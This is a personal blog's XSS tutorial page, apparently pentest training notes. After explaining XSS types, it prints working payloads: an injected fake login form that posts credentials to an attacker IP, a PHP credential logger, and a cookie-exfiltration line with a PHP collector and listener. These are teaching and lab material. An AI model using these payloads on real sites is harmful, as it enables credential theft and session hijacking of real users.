dannydekkers.nl
Windows
Linux
Web
AI
dannydekkers.nl

XSS

Cross-Site Scripting is among the most common vulnerabilities.

When a vulnerable webapp receiving HTML code from back-end and rendering it on client-side does not properly santize user input its possible to inject Javascript code into input fields.

XSS Attacks

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. Stored XSS is persistent meaning stored on server and will affect any user which visits the page. Non-persistent meaning not stored on server and temporary. Reflected XSS gets processed by server and DOM-based XSS is fully processed on client-side, never reaching back-end server.

TypeDescriptions
Stored XSSMost critical, occurs when user input is stored on back-end database.
Reflected XSSOccurs when user input is displayed after being processed by backend server.
DOM XSSOccurs when user input is directly shown in the browser and is completely processed on the client-side

XXS Discovery

Use automated scanners like Nessus, Nikto, Burp, ZAP. Or open source tools:

Manuallly test using XSS payloads intro input elements and HTTP headers. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md)

Code review, understand how input is being handled to write custsom payloads.

XSS Attacks

There is defacing if we can change the look and feel of website, even changing text and use it for a Phishing attack.

# Create Login page
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

Payload 

'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.24:8888><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

Simple PHP script 

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

Session Hijacking

Its possible to use JavaScript to collect victim's cookies and send them to their own server and login. Sometimes we can't see how our input is handled which is called Blind XSS, we can still check for vulns by using http requests. 

# Write this line to script.js
new Image().src='http://PWNIP:PWNPO/index.php?c='+document.cookie;

# Host index.php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

# Start listener
php -S 0.0.0.0:8080

# Execute payload
"><script src=http://PWNIP:PWNPO/script.js></script>

© 2025 | All rights reserved

Inquiries at contact@dannydekkers.nl